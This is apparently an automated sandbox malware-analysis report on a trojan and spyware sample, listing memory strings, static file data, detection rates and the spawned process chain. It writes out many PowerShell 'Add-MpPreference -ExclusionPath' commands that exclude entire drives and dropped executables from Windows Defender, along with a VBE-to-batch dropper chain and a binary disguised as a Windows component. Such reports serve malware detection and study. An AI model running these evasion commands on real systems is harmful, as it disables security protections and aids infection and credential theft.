http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000024.00000002.2112170584.0000025DD8A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: powershell.exe, 00000005.00000002.2041086006.0000026E82751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2135632693.000002CDC6421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2202737559.00000250B3C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1972511544.0000017105EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2120399113.000001CB1FE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2112174865.0000016F53B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2271768418.0000022A47451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2211838897.00000153B0391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2174593957.000002485EAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1977884967.0000028C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2144215284.0000015F57CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2203594616.000002544D281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1981281696.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2017656975.000001B4CE731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2084580351.00000244BC9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1965392559.0000013C90581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1985502120.0000028000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2112170584.0000025DD8832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: svchost.exe, 00000032.00000003.1990825251.0000024CA640E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                    Source: powershell.exe, 00000024.00000002.2112170584.0000025DD8A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: ZFJ29xz0hp.46.dr, wY9uPTFJlc.46.dr, MEN9iMUhSt.46.dr, ny3b86gmHR.46.dr, hlKWGWEAdu.46.dr, vbc6stWss0.46.dr, jDfjNEWOms.46.dr, bwQGjkm5wI.46.dr, 8cwcDHU7zp.46.dr, 4tY2I0JyeN.46.dr, hi1VUgBky6.46.dr, IEayz3YRRP.46.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F06FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00F06FAA
                                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0848E0_2_00F0848E
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F040FE0_2_00F040FE
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F100B70_2_00F100B7
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F140880_2_00F14088
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F251C90_2_00F251C9
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F171530_2_00F17153
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F032F70_2_00F032F7
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F162CA0_2_00F162CA
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F143BF0_2_00F143BF
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0F4610_2_00F0F461
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F2D4400_2_00F2D440
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0C4260_2_00F0C426
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F177EF0_2_00F177EF
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F2D8EE0_2_00F2D8EE
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0286B0_2_00F0286B
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F319F40_2_00F319F4
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0E9B70_2_00F0E9B7
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F16CDC0_2_00F16CDC
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F13E0B0_2_00F13E0B
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0EFE20_2_00F0EFE2
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F24F9A0_2_00F24F9A
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeCode function: 4_2_00007FFD9BAA0D4C4_2_00007FFD9BAA0D4C
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeCode function: 4_2_00007FFD9BAA0E434_2_00007FFD9BAA0E43
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeCode function: 4_2_00007FFD9BEA919F4_2_00007FFD9BEA919F
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: String function: 00F1EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: String function: 00F1F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: String function: 00F1EB78 appears 39 times
                                    Source: ZZ2sTsJFrt.exe, 00000000.00000003.1681656180.000000000318A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs ZZ2sTsJFrt.exe
                                    Source: ZZ2sTsJFrt.exe, 00000000.00000002.1682440714.000000000318A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs ZZ2sTsJFrt.exe
                                    Source: ZZ2sTsJFrt.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs ZZ2sTsJFrt.exe
                                    Source: ZZ2sTsJFrt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: HyperPortContainerproviderinto.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AaHCyFZRuOMjGDqdgJ.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: dasHost.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AaHCyFZRuOMjGDqdgJ.exe0.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AaHCyFZRuOMjGDqdgJ.exe1.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AaHCyFZRuOMjGDqdgJ.exe2.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@74/341@2/2
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F06C74 GetLastError,FormatMessageW,0_2_00F06C74
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00F1A6C2
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exeJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeFile created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitorJump to behavior
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3916:120:WilError_03
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-cgzjbH04kjspqA3ekPHR
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8300:120:WilError_03
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile created: C:\Users\user\AppData\Local\Temp\5lJ5SP1bedJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" "
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCommand line argument: sfxname0_2_00F1DF1E
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCommand line argument: sfxstime0_2_00F1DF1E
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCommand line argument: STARTDLG0_2_00F1DF1E
                                    Source: ZZ2sTsJFrt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: ZZ2sTsJFrt.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: AswWpn6hP1.46.dr, QVXBnSKQUm.46.dr, R6d8d7j4J7.46.dr, yBHFK1qDN9.46.dr, iKJkaEAGEb.46.dr, LFlGO8ryoD.46.dr, G7DVfGrqLy.46.dr, GoWrFNObvp.46.dr, OVXgbAnMQJ.46.dr, iyZ8Grc2Dj.46.dr, caxQXYryr3.46.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: ZZ2sTsJFrt.exeReversingLabs: Detection: 70%
                                    Source: ZZ2sTsJFrt.exeVirustotal: Detection: 52%
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeFile read: C:\Users\user\Desktop\ZZ2sTsJFrt.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\ZZ2sTsJFrt.exe "C:\Users\user\Desktop\ZZ2sTsJFrt.exe"
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe"
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe"Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
